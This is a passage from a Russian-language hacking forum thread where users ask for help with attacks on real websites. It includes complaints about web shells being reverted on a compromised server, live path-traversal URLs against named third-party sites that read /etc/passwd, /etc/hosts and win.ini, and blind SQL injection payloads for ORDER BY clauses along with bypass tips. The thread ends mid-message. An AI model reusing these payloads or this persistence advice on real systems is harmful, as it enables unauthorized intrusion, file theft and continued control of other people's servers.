Ваши вопросы по уязвимостям.

Клац

 

Скрипт сработал и повис на некоторое время сервак, но когда перезагрузился файлы откатились.
Искал-искал и так не понял - откуда они подгружаются.
Есть какие-нибудь идеи?
Так же скрипты из строки браузера не запускаются. Т.е. тупо не исполняются :O
Приходится использовать Execute: php 1.php
Вот.
А, ну и ещё одно. Как-то странно происходит процесс восстановления данных.
Обновляются файлы до каких-то непонятных времён, т.е. мой шелл восстанавливается из удалённых, а шеллы в других папках не восстанавливаются, но заливались все в одно и тоже время.

Заметил, что обновляются они по разному:
В одно время в .htaccess есть доп. строки

HTML:

<FilesMatch "^\.">
  Deny from all
</FilesMatch>
<FilesMatch "\.\.">
  Deny from all
</FilesMatch>

В другое время их нету

 

а зачем тебе идеи? отредачит файл - запустил скрипт, сервак повис, ребнулся и вместе с ним и кеш обновился, что еще для счастья нада?

 

Сервак повис -> ребутнулся -> восстановил все файлы откуда-то в их первоначальный вид.

 

Через соседа, где file_priv Y, например поддомен uha .
Mq=off
http://fisher.spb.ru/php.php

 

та не, не в первоначальный вид, такого не может быть, песле перезагрузки он считывает файлы и помещает результат в кеш, тоесть в кеше окажутся последние изменения файлов

 

Теперь сервак не падает.
Он выдаёт 408 на несколько секунд и дальше происходит одно из двух:
1. Либо восстанавливаются первоначальные файлы, либо
2. Ничего не происходит и новый текст так и не отображается

 

Помогите пожалуйста.
Не понимаю в чём дело.

Code:

http://dviu.ranepa.ru/index.php?page=..\..\..\..\..\..\..\windows\win.ini%00

http://www.lhc-facts.ch/index.php?page=../../../../../../../../../../etc/hosts%00

http://www.spaskrug-osetia.ru/index.php?page=../../../../../../../etc/hosts%00

http://klenovskoe.ru/index.php?page=../../../../../../../../../../etc/passwd%00

 

В чем может быть причина того, что на некоторых сайтах запрос:

Code:

order=1 rlike (SELECT (case when(1=1) then (select 1 union select 2) else 1 end))%23

всё время возвращает пустой результат (при 1=1 или 1=0).
Инъекция в order by.

 

XAMEHA, при числе записи = 1 всё нормально:

Code:

select 1 FROM (SELECT 2)x WHERE 1 ORDER BY 1 rlike (SELECT (case when(1=0) then 0x28 else 1 end))
# Вернет 1
select 1 FROM (SELECT 2)x WHERE 1 ORDER BY 1 rlike (SELECT (case when(1=1) then 0x28 else 1 end))
# Вернет #1139 - Got error 'parentheses not balanced' from regexp

 

XAMEHA, спасибо за ссылку, так работает:

Code:

order=min(0 rlike if((%s),1,0x00))#

 

никто не в курсе как через БД джомлы найти урл от сайта(кроме как искать сайт по контенту в БД), а то чёт ничего путёвого там ненахожу

 

Попробуй так:

Code:

SELECT name FROM #__menu LIMIT 0,1

 

не, там только титлы

 

А в колонке link?
SELECT link FROM #__menu

 

При фильтрации скобок в boolean based blind sql injection есть вектора?

 

Заготовок, которые можно подставить, нет. Раскрутить возможно.

Обычно используются конструкции с union select, where, regexp и case (blind sql-injection),.

 

Если имеются ввиду эти скобки <> то блайнд с полным перебором только можно воспроизвести

 

Новонайденный вектор: